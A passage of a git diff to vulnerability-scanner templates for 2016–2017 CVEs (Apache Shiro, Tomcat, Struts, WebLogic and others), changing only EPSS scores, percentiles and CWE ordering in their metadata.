@@ info: cve-id: CVE-2016-4437 cwe-id: CWE-284 epss-score: 0.97507 - epss-percentile: 0.99967 + epss-percentile: 0.99977 cpe: cpe:2.3:a:apache:shiro:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2016/CVE-2016-4975.yaml b/http/cves/2016/CVE-2016-4975.yaml index baacf4214d..c0dd60412e 100644 --- a/http/cves/2016/CVE-2016-4975.yaml +++ b/http/cves/2016/CVE-2016-4975.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2016-4975 cwe-id: CWE-93 epss-score: 0.00428 - epss-percentile: 0.71207 + epss-percentile: 0.71497 cpe: cpe:2.3:a:apache:http_server:2.2.0:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2016/CVE-2016-4977.yaml b/http/cves/2016/CVE-2016-4977.yaml index cd4ac35ff8..14f0990d1c 100644 --- a/http/cves/2016/CVE-2016-4977.yaml +++ b/http/cves/2016/CVE-2016-4977.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2016-4977 cwe-id: CWE-19 epss-score: 0.03345 - epss-percentile: 0.9012 + epss-percentile: 0.90255 cpe: cpe:2.3:a:pivotal:spring_security_oauth:1.0.0:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2016/CVE-2016-5649.yaml b/http/cves/2016/CVE-2016-5649.yaml index c690d1423a..f246b123aa 100644 --- a/http/cves/2016/CVE-2016-5649.yaml +++ b/http/cves/2016/CVE-2016-5649.yaml @@ -15,9 +15,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2016-5649 - cwe-id: CWE-200,CWE-319 + cwe-id: CWE-319,CWE-200 epss-score: 0.15681 - epss-percentile: 0.95209 + epss-percentile: 0.95295 cpe: cpe:2.3:o:netgear:dgn2200_firmware:1.0.0.50_7.0.50:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2016/CVE-2016-6195.yaml b/http/cves/2016/CVE-2016-6195.yaml index 8f1834dda9..7ef528cc2d 100644 --- a/http/cves/2016/CVE-2016-6195.yaml +++ b/http/cves/2016/CVE-2016-6195.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2016-6195 cwe-id: CWE-89 epss-score: 0.00284 - epss-percentile: 0.64634 + epss-percentile: 0.6503 cpe: cpe:2.3:a:vbulletin:vbulletin:*:patch_level_4:*:*:*:*:*:* metadata: verified: "true" diff --git a/http/cves/2016/CVE-2016-6277.yaml b/http/cves/2016/CVE-2016-6277.yaml index a826c76e35..75380ee8a2 100644 --- a/http/cves/2016/CVE-2016-6277.yaml +++ b/http/cves/2016/CVE-2016-6277.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2016-6277 cwe-id: CWE-352 epss-score: 0.97471 - epss-percentile: 0.99942 + epss-percentile: 0.99953 cpe: cpe:2.3:o:netgear:d6220_firmware:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2016/CVE-2016-6601.yaml b/http/cves/2016/CVE-2016-6601.yaml index 0b8c45c132..c47fad73e8 100644 --- a/http/cves/2016/CVE-2016-6601.yaml +++ b/http/cves/2016/CVE-2016-6601.yaml @@ -18,8 +18,8 @@ info: cvss-score: 7.5 cve-id: CVE-2016-6601 cwe-id: CWE-22 - epss-score: 0.97518 - epss-percentile: 0.99974 + epss-score: 0.97523 + epss-percentile: 0.99986 cpe: cpe:2.3:a:zohocorp:webnms_framework:5.2:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2016/CVE-2016-7552.yaml b/http/cves/2016/CVE-2016-7552.yaml index 85a381cfe0..60eb025fe4 100644 --- a/http/cves/2016/CVE-2016-7552.yaml +++ b/http/cves/2016/CVE-2016-7552.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2016-7552 cwe-id: CWE-22 epss-score: 0.97004 - epss-percentile: 0.99624 + epss-percentile: 0.99648 cpe: cpe:2.3:a:trendmicro:threat_discovery_appliance:2.6.1062:r1:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2016/CVE-2016-7834.yaml b/http/cves/2016/CVE-2016-7834.yaml index 5c7fa948d1..80dc3dc121 100644 --- a/http/cves/2016/CVE-2016-7834.yaml +++ b/http/cves/2016/CVE-2016-7834.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2016-7834 cwe-id: CWE-200 epss-score: 0.00202 - epss-percentile: 0.57452 + epss-percentile: 0.57845 cpe: cpe:2.3:o:sony:snc_series_firmware:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2016/CVE-2016-7981.yaml b/http/cves/2016/CVE-2016-7981.yaml index 2111491153..19d8b8c5c1 100644 --- a/http/cves/2016/CVE-2016-7981.yaml +++ b/http/cves/2016/CVE-2016-7981.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2016-7981 cwe-id: CWE-79 epss-score: 0.00258 - epss-percentile: 0.62782 + epss-percentile: 0.63194 cpe: cpe:2.3:a:spip:spip:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2016/CVE-2016-8527.yaml b/http/cves/2016/CVE-2016-8527.yaml index 418bd7fa36..9ff11384fa 100644 --- a/http/cves/2016/CVE-2016-8527.yaml +++ b/http/cves/2016/CVE-2016-8527.yaml @@ -17,8 +17,8 @@ info: cvss-score: 6.1 cve-id: CVE-2016-8527 cwe-id: CWE-79 - epss-score: 0.00221 - epss-percentile: 0.59489 + epss-score: 0.0024 + epss-percentile: 0.61682 cpe: cpe:2.3:a:hp:airwave:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2017/CVE-2017-0929.yaml b/http/cves/2017/CVE-2017-0929.yaml index 4b7ad2f80b..b69e1c8149 100644 --- a/http/cves/2017/CVE-2017-0929.yaml +++ b/http/cves/2017/CVE-2017-0929.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2017-0929 cwe-id: CWE-918 epss-score: 0.03588 - epss-percentile: 0.90434 + epss-percentile: 0.90543 cpe: cpe:2.3:a:dnnsoftware:dotnetnuke:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2017/CVE-2017-1000028.yaml b/http/cves/2017/CVE-2017-1000028.yaml index fd88c77173..24501ddb4c 100644 --- a/http/cves/2017/CVE-2017-1000028.yaml +++ b/http/cves/2017/CVE-2017-1000028.yaml @@ -18,8 +18,8 @@ info: cvss-score: 7.5 cve-id: CVE-2017-1000028 cwe-id: CWE-22 - epss-score: 0.97522 - epss-percentile: 0.99977 + epss-score: 0.97516 + epss-percentile: 0.99981 cpe: cpe:2.3:a:oracle:glassfish_server:4.1:*:*:*:open_source:*:*:* metadata: max-request: 2 diff --git a/http/cves/2017/CVE-2017-1000029.yaml b/http/cves/2017/CVE-2017-1000029.yaml index ebcbd705c9..bf03b1a116 100644 --- a/http/cves/2017/CVE-2017-1000029.yaml +++ b/http/cves/2017/CVE-2017-1000029.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2017-1000029 cwe-id: CWE-200 epss-score: 0.00387 - epss-percentile: 0.69803 + epss-percentile: 0.7013 cpe: cpe:2.3:a:oracle:glassfish_server:3.0.1:*:*:*:open_source:*:*:* metadata: max-request: 1 diff --git a/http/cves/2017/CVE-2017-1000163.yaml b/http/cves/2017/CVE-2017-1000163.yaml index 477dfd6a64..006e7bb98c 100644 --- a/http/cves/2017/CVE-2017-1000163.yaml +++ b/http/cves/2017/CVE-2017-1000163.yaml @@ -16,8 +16,8 @@ info: cvss-score: 6.1 cve-id: CVE-2017-1000163 cwe-id: CWE-601 - epss-score: 0.00151 - epss-percentile: 0.50609 + epss-score: 0.00154 + epss-percentile: 0.51464 cpe: cpe:2.3:a:phoenixframework:phoenix:1.0.0:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2017/CVE-2017-1000170.yaml b/http/cves/2017/CVE-2017-1000170.yaml index 9ad45c4d70..760c51956a 100644 --- a/http/cves/2017/CVE-2017-1000170.yaml +++ b/http/cves/2017/CVE-2017-1000170.yaml @@ -17,8 +17,8 @@ info: cvss-score: 7.5 cve-id: CVE-2017-1000170 cwe-id: CWE-22 - epss-score: 0.73129 - epss-percentile: 0.97669 + epss-score: 0.70305 + epss-percentile: 0.97648 cpe: cpe:2.3:a:jqueryfiletree_project:jqueryfiletree:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2017/CVE-2017-1000486.yaml b/http/cves/2017/CVE-2017-1000486.yaml index a9d270e957..a8b7a314ea 100644 --- a/http/cves/2017/CVE-2017-1000486.yaml +++ b/http/cves/2017/CVE-2017-1000486.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2017-1000486 cwe-id: CWE-326 epss-score: 0.96992 - epss-percentile: 0.99619 + epss-percentile: 0.99642 cpe: cpe:2.3:a:primetek:primefaces:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2017/CVE-2017-10075.yaml b/http/cves/2017/CVE-2017-10075.yaml index 078cf3897b..d7aa1694cb 100644 --- a/http/cves/2017/CVE-2017-10075.yaml +++ b/http/cves/2017/CVE-2017-10075.yaml @@ -18,7 +18,7 @@ info: cvss-score: 8.2 cve-id: CVE-2017-10075 epss-score: 0.00409 - epss-percentile: 0.70564 + epss-percentile: 0.70871 cpe: cpe:2.3:a:oracle:webcenter_content:11.1.1.9.0:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2017/CVE-2017-10271.yaml b/http/cves/2017/CVE-2017-10271.yaml index 84e7654a49..eb77c9ebfa 100644 --- a/http/cves/2017/CVE-2017-10271.yaml +++ b/http/cves/2017/CVE-2017-10271.yaml @@ -19,7 +19,7 @@ info: cvss-score: 7.5 cve-id: CVE-2017-10271 epss-score: 0.97438 - epss-percentile: 0.99911 + epss-percentile: 0.99927 cpe: cpe:2.3:a:oracle:weblogic_server:10.3.6.0.0:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2017/CVE-2017-10974.yaml b/http/cves/2017/CVE-2017-10974.yaml index ae7fc212db..634947141e 100644 --- a/http/cves/2017/CVE-2017-10974.yaml +++ b/http/cves/2017/CVE-2017-10974.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2017-10974 cwe-id: CWE-22 epss-score: 0.96161 - epss-percentile: 0.99289 + epss-percentile: 0.9932 cpe: cpe:2.3:a:yaws:yaws:1.91:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2017/CVE-2017-11165.yaml b/http/cves/2017/CVE-2017-11165.yaml index efe49f232d..a87187282f 100644 --- a/http/cves/2017/CVE-2017-11165.yaml +++ b/http/cves/2017/CVE-2017-11165.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2017-11165 cwe-id: CWE-200 epss-score: 0.94336 - epss-percentile: 0.98871 + epss-percentile: 0.98926 cpe: cpe:2.3:o:datataker:dt80_dex_firmware:1.50.012:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2017/CVE-2017-11444.yaml b/http/cves/2017/CVE-2017-11444.yaml index 8dd23f10e7..99a2229e9d 100644 --- a/http/cves/2017/CVE-2017-11444.yaml +++ b/http/cves/2017/CVE-2017-11444.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2017-11444 cwe-id: CWE-89 epss-score: 0.04447 - epss-percentile: 0.91351 + epss-percentile: 0.91444 cpe: cpe:2.3:a:intelliants:subrion_cms:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2017/CVE-2017-11512.yaml b/http/cves/2017/CVE-2017-11512.yaml index 25bbeab7c3..34be69062a 100644 --- a/http/cves/2017/CVE-2017-11512.yaml +++ b/http/cves/2017/CVE-2017-11512.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2017-11512 cwe-id: CWE-22 epss-score: 0.97175 - epss-percentile: 0.99714 + epss-percentile: 0.99739 cpe: cpe:2.3:a:manageengine:servicedesk:9.3.9328:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2017/CVE-2017-11586.yaml b/http/cves/2017/CVE-2017-11586.yaml index be88124dd2..09e9a7f622 100644 --- a/http/cves/2017/CVE-2017-11586.yaml +++ b/http/cves/2017/CVE-2017-11586.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2017-11586 cwe-id: CWE-601 epss-score: 0.00121 - epss-percentile: 0.45569 + epss-percentile: 0.45951 cpe: cpe:2.3:a:finecms:finecms:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2017/CVE-2017-11610.yaml b/http/cves/2017/CVE-2017-11610.yaml index 12f7e1eced..8959cb058a 100644 --- a/http/cves/2017/CVE-2017-11610.yaml +++ b/http/cves/2017/CVE-2017-11610.yaml @@ -18,8 +18,8 @@ info: cvss-score: 8.8 cve-id: CVE-2017-11610 cwe-id: CWE-276 - epss-score: 0.97461 - epss-percentile: 0.99932 + epss-score: 0.97469 + epss-percentile: 0.99951 cpe: cpe:2.3:a:supervisord:supervisor:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2017/CVE-2017-11629.yaml b/http/cves/2017/CVE-2017-11629.yaml index 8cb7b988bd..da3958ad23 100644 --- a/http/cves/2017/CVE-2017-11629.yaml +++ b/http/cves/2017/CVE-2017-11629.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2017-11629 cwe-id: CWE-79 epss-score: 0.001 - epss-percentile: 0.40499 + epss-percentile: 0.40814 cpe: cpe:2.3:a:finecms:finecms:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2017/CVE-2017-12138.yaml b/http/cves/2017/CVE-2017-12138.yaml index c7d018d096..91d44f7a71 100644 --- a/http/cves/2017/CVE-2017-12138.yaml +++ b/http/cves/2017/CVE-2017-12138.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2017-12138 cwe-id: CWE-601 epss-score: 0.00062 - epss-percentile: 0.24266 + epss-percentile: 0.24635 cpe: cpe:2.3:a:xoops:xoops:2.5.8:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2017/CVE-2017-12149.yaml b/http/cves/2017/CVE-2017-12149.yaml index 74cefe700e..d27bed275f 100644 --- a/http/cves/2017/CVE-2017-12149.yaml +++ b/http/cves/2017/CVE-2017-12149.yaml @@ -18,8 +18,8 @@ info: cvss-score: 9.8 cve-id: CVE-2017-12149 cwe-id: CWE-502 - epss-score: 0.97292 - epss-percentile: 0.9979 + epss-score: 0.9719 + epss-percentile: 0.99749 cpe: cpe:2.3:a:redhat:jboss_enterprise_application_platform:5.0.0:*:*:*:*:*:*:* metadata: max-request: 3 diff --git a/http/cves/2017/CVE-2017-12542.yaml b/http/cves/2017/CVE-2017-12542.yaml index bbfbfc573c..b78a4cffeb 100644 --- a/http/cves/2017/CVE-2017-12542.yaml +++ b/http/cves/2017/CVE-2017-12542.yaml @@ -17,8 +17,8 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H cvss-score: 10 cve-id: CVE-2017-12542 - epss-score: 0.97361 - epss-percentile: 0.99841 + epss-score: 0.97377 + epss-percentile: 0.99875 cpe: cpe:2.3:o:hp:integrated_lights-out_4_firmware:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2017/CVE-2017-12544.yaml b/http/cves/2017/CVE-2017-12544.yaml index d56380cb90..9f22ff0ff3 100644 --- a/http/cves/2017/CVE-2017-12544.yaml +++ b/http/cves/2017/CVE-2017-12544.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2017-12544 cwe-id: CWE-79 epss-score: 0.96723 - epss-percentile: 0.99503 + epss-percentile: 0.99533 cpe: cpe:2.3:a:hp:system_management_homepage:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2017/CVE-2017-12583.yaml b/http/cves/2017/CVE-2017-12583.yaml index b8f4e8a471..209362cbe4 100644 --- a/http/cves/2017/CVE-2017-12583.yaml +++ b/http/cves/2017/CVE-2017-12583.yaml @@ -16,7 +16,7 @@ info: cve-id: CVE-2017-12583 cwe-id: CWE-79 epss-score: 0.001 - epss-percentile: 0.40499 + epss-percentile: 0.40814 cpe: cpe:2.3:a:dokuwiki:dokuwiki:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2017/CVE-2017-12611.yaml b/http/cves/2017/CVE-2017-12611.yaml index cc48a8b7fb..6fe7719968 100644 --- a/http/cves/2017/CVE-2017-12611.yaml +++ b/http/cves/2017/CVE-2017-12611.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2017-12611 cwe-id: CWE-20 epss-score: 0.97358 - epss-percentile: 0.99841 + epss-percentile: 0.99858 cpe: cpe:2.3:a:apache:struts:2.0.1:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2017/CVE-2017-12615.yaml b/http/cves/2017/CVE-2017-12615.yaml index 2a60275827..7878d8d912 100644 --- a/http/cves/2017/CVE-2017-12615.yaml +++ b/http/cves/2017/CVE-2017-12615.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2017-12615 cwe-id: CWE-434 epss-score: 0.97499 - epss-percentile: 0.99962 + epss-percentile: 0.99972 cpe: cpe:2.3:a:apache:tomcat:7.0:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2017/CVE-2017-12617.yaml b/http/cves/2017/CVE-2017-12617.yaml index 39dfd84822..48e03607a5 100644 --- a/http/cves/2017/CVE-2017-12617.yaml +++ b/http/cves/2017/CVE-2017-12617.yaml @@ -19,8 +19,8 @@ info: cvss-score: 8.1 cve-id: "CVE-2017-12617" cwe-id: CWE-434 - epss-score: 0.97542 - epss-percentile: 0.9999 + epss-score: 0.97494 + epss-percentile: 0.99969 cpe: cpe:2.3:a:apache:tomcat:7.0.0:*:*:*:*:*:*:* metadata: verified: "true" diff --git a/http/cves/2017/CVE-2017-12629.yaml b/http/cves/2017/CVE-2017-12629.yaml index ed3861af9b..d6f8ad3b8e 100644 --- a/http/cves/2017/CVE-2017-12629.yaml +++ b/http/cves/2017/CVE-2017-12629.yaml @@ -18,8 +18,8 @@ info: cvss-score: 9.8 cve-id: CVE-2017-12629 cwe-id: CWE-611 - epss-score: 0.97452 - epss-percentile: 0.99923 + epss-score: 0.97423 + epss-percentile: 0.9991 cpe: cpe:2.3:a:apache:solr:*:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2017/CVE-2017-12635.yaml b/http/cves/2017/CVE-2017-12635.yaml index 01abe6a5ba..99fe1fae0e 100644 --- a/http/cves/2017/CVE-2017-12635.yaml +++ b/http/cves/2017/CVE-2017-12635.yaml @@ -18,8 +18,8 @@ info: cvss-score: 9.8 cve-id: CVE-2017-12635 cwe-id: CWE-269 - epss-score: 0.97536 - epss-percentile: 0.99988 + epss-score: 0.97532 + epss-percentile: 0.99989 cpe: cpe:2.3:a:apache:couchdb:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2017/CVE-2017-12637.yaml b/http/cves/2017/CVE-2017-12637.yaml index 34fec57bb8..ed007592af 100644 --- a/http/cves/2017/CVE-2017-12637.yaml +++ b/http/cves/2017/CVE-2017-12637.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2017-12637 cwe-id: CWE-22 epss-score: 0.00648 - epss-percentile: 0.76701 + epss-percentile: 0.76965 cpe: cpe:2.3:a:sap:netweaver_application_server_java:7.50:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2017/CVE-2017-12794.yaml b/http/cves/2017/CVE-2017-12794.yaml index 7e516b6081..7870590546 100644 --- a/http/cves/2017/CVE-2017-12794.yaml +++ b/http/cves/2017/CVE-2017-12794.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2017-12794 cwe-id: CWE-79 epss-score: 0.00219 - epss-percentile: 0.59163 + epss-percentile: 0.59559 cpe: cpe:2.3:a:djangoproject:django:1.10.0:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2017/CVE-2017-14135.yaml b/http/cves/2017/CVE-2017-14135.yaml index f3fcb3fe1c..fbd132428d 100644 --- a/http/cves/2017/CVE-2017-14135.yaml +++ b/http/cves/2017/CVE-2017-14135.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2017-14135 cwe-id: CWE-78 epss-score: 0.96679 - epss-percentile: 0.99486 + epss-percentile: 0.99513 cpe: cpe:2.3:a:dreambox:opendreambox:2.0:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2017/CVE-2017-14186.yaml b/http/cves/2017/CVE-2017-14186.yaml index 1260cbe409..89a1dc3743 100644 --- a/http/cves/2017/CVE-2017-14186.yaml +++ b/http/cves/2017/CVE-2017-14186.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2017-14186 cwe-id: CWE-79 epss-score: 0.02948 - epss-percentile: 0.89542 + epss-percentile: 0.89692 cpe: cpe:2.3:o:fortinet:fortios:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2017/CVE-2017-14524.yaml b/http/cves/2017/CVE-2017-14524.yaml index c9e3fe61d8..e15d2e3eb8 100644 --- a/http/cves/2017/CVE-2017-14524.yaml +++ b/http/cves/2017/CVE-2017-14524.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2017-14524 cwe-id: CWE-601 epss-score: 0.00258 - epss-percentile: 0.62785 + epss-percentile: 0.63197 cpe: cpe:2.3:a:opentext:documentum_administrator:7.2.0180.0055:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2017/CVE-2017-14535.yaml b/http/cves/2017/CVE-2017-14535.yaml index 16a0c99bb3..9afc2af310 100644 --- a/http/cves/2017/CVE-2017-14535.yaml +++ b/http/cves/2017/CVE-2017-14535.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2017-14535 cwe-id: CWE-78 epss-score: 0.04456 - epss-percentile: 0.91357 + epss-percentile: 0.91455 cpe: cpe:2.3:a:netfortris:trixbox:2.8.0.4:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2017/CVE-2017-14537.yaml b/http/cves/2017/CVE-2017-14537.yaml index 71a5818719..35f85eff6e 100644 --- a/http/cves/2017/CVE-2017-14537.yaml +++ b/http/cves/2017/CVE-2017-14537.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2017-14537 cwe-id: CWE-22 epss-score: 0.01002 - epss-percentile: 0.81748 + epss-percentile: 0.81947 cpe: cpe:2.3:a:netfortris:trixbox:2.8.0.4:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2017/CVE-2017-14622.yaml b/http/cves/2017/CVE-2017-14622.yaml index 5df9103dca..6147772a77 100644 --- a/http/cves/2017/CVE-2017-14622.yaml +++ b/http/cves/2017/CVE-2017-14622.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2017-14622 cwe-id: CWE-79 epss-score: 0.00135 - epss-percentile: 0.47979 + epss-percentile: 0.48346 cpe: cpe:2.3:a:2kblater:2kb_amazon_affiliates_store:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2017/CVE-2017-14651.yaml b/http/cves/2017/CVE-2017-14651.yaml index 45ebd5741d..78ea014251 100644 --- a/http/cves/2017/CVE-2017-14651.yaml +++ b/http/cves/2017/CVE-2017-14651.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2017-14651 cwe-id: CWE-79 epss-score: 0.00144 - epss-percentile: 0.49573 + epss-percentile: 0.49947 cpe: cpe:2.3:a:wso2:api_manager:2.1.0:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2017/CVE-2017-14849.yaml b/http/cves/2017/CVE-2017-14849.yaml index 1d1f18c262..65389856bc 100644 --- a/http/cves/2017/CVE-2017-14849.yaml +++ b/http/cves/2017/CVE-2017-14849.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2017-14849 cwe-id: CWE-22 epss-score: 0.96872 - epss-percentile: 0.9957 + epss-percentile: 0.9959 cpe: cpe:2.3:a:nodejs:node.js:8.5.0:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2017/CVE-2017-15287.yaml b/http/cves/2017/CVE-2017-15287.yaml index 8a2b4e34ac..6174a0f808 100644 --- a/http/cves/2017/CVE-2017-15287.yaml +++ b/http/cves/2017/CVE-2017-15287.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2017-15287 cwe-id: CWE-79 epss-score: 0.00129 - epss-percentile: 0.46905 + epss-percentile: 0.47213 cpe: cpe:2.3:a:bouqueteditor_project:bouqueteditor:2.0.0:*:*:*:*:dreambox:*:* metadata: max-request: 1 diff --git a/http/cves/2017/CVE-2017-15363.yaml b/http/cves/2017/CVE-2017-15363.yaml index 654d4a1ba0..272935cd77 100644 --- a/http/cves/2017/CVE-2017-15363.yaml +++ b/http/cves/2017/CVE-2017-15363.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2017-15363 cwe-id: CWE-22 epss-score: 0.04393 - epss-percentile: 0.91303 + epss-percentile: 0.91402 cpe: cpe:2.3:a:luracast:restler:*:*:*:*:*:typo3:*:* metadata: max-request: 1 diff --git a/http/cves/2017/CVE-2017-15647.yaml b/http/cves/2017/CVE-2017-15647.yaml index 6bc0c78bdc..fcc4955d3d 100644 --- a/http/cves/2017/CVE-2017-15647.yaml +++ b/http/cves/2017/CVE-2017-15647.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2017-15647 cwe-id: CWE-22 epss-score: 0.02013 - epss-percentile: 0.87436 + epss-percentile: 0.87592 cpe: cpe:2.3:o:fiberhome:routerfiberhome_firmware:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2017/CVE-2017-15715.yaml b/http/cves/2017/CVE-2017-15715.yaml index 7506ebf435..a8948dda72 100644 --- a/http/cves/2017/CVE-2017-15715.yaml +++ b/http/cves/2017/CVE-2017-15715.yaml @@ -18,8 +18,8 @@ info: cvss-score: 8.1 cve-id: CVE-2017-15715 cwe-id: CWE-20 - epss-score: 0.97053 - epss-percentile: 0.99649 + epss-score: 0.97023 + epss-percentile: 0.99658 cpe: cpe:2.3:a:apache:http_server:*:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2017/CVE-2017-15944.yaml b/http/cves/2017/CVE-2017-15944.yaml index 582d380067..e39f1c8bcf 100644 --- a/http/cves/2017/CVE-2017-15944.yaml +++ b/http/cves/2017/CVE-2017-15944.yaml @@ -17,8 +17,8 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2017-15944 - epss-score: 0.97425 - epss-percentile: 0.99895 + epss-score: 0.97427 + epss-percentile: 0.99914 cpe: cpe:2.3:o:paloaltonetworks:pan-os:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2017/CVE-2017-16806.yaml b/http/cves/2017/CVE-2017-16806.yaml index 55d7eb2883..0443d1007b 100644 --- a/http/cves/2017/CVE-2017-16806.yaml +++ b/http/cves/2017/CVE-2017-16806.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2017-16806 cwe-id: CWE-22 epss-score: 0.07055 - epss-percentile: 0.93105 + epss-percentile: 0.93201 cpe: cpe:2.3:a:ulterius:ulterius_server:1.5.6.0:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2017/CVE-2017-16877.yaml b/http/cves/2017/CVE-2017-16877.yaml index 3271ccd802..8b42f36ce1 100644 --- a/http/cves/2017/CVE-2017-16877.yaml +++ b/http/cves/2017/CVE-2017-16877.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2017-16877 cwe-id: CWE-22 epss-score: 0.0032 - epss-percentile: 0.66762 + epss-percentile: 0.67133 cpe: cpe:2.3:a:zeit:next.js:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2017/CVE-2017-16894.yaml b/http/cves/2017/CVE-2017-16894.yaml index dc76963dd1..36a9295b0b 100644 --- a/http/cves/2017/CVE-2017-16894.yaml +++ b/http/cves/2017/CVE-2017-16894.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2017-16894 cwe-id: CWE-200 epss-score: 0.29151 - epss-percentile: 0.9629 + epss-percentile: 0.96332 cpe: cpe:2.3:a:laravel:laravel:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2017/CVE-2017-17043.yaml b/http/cves/2017/CVE-2017-17043.yaml index 7083be0b7e..33ec715ba0 100644 --- a/http/cves/2017/CVE-2017-17043.yaml +++ b/http/cves/2017/CVE-2017-17043.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2017-17043 cwe-id: CWE-79 epss-score: 0.00245 - epss-percentile: 0.6175 + epss-percentile: 0.62181 cpe: cpe:2.3:a:zitec:emag_marketplace_connector:1.0.0:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2017/CVE-2017-17059.yaml b/http/cves/2017/CVE-2017-17059.yaml index a8919bc489..6d77af1459 100644 --- a/http/cves/2017/CVE-2017-17059.yaml +++ b/http/cves/2017/CVE-2017-17059.yaml @@ -16,8 +16,8 @@ info: cvss-score: 6.1 cve-id: CVE-2017-17059 cwe-id: CWE-79 - epss-score: 0.00263 - epss-percentile: 0.63188 + epss-score: 0.00261 + epss-percentile: 0.63496 cpe: cpe:2.3:a:amtythumb_project:amtythumb:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2017/CVE-2017-17451.yaml b/http/cves/2017/CVE-2017-17451.yaml index 7752e2f05d..16b0b66c44 100644 --- a/http/cves/2017/CVE-2017-17451.yaml +++ 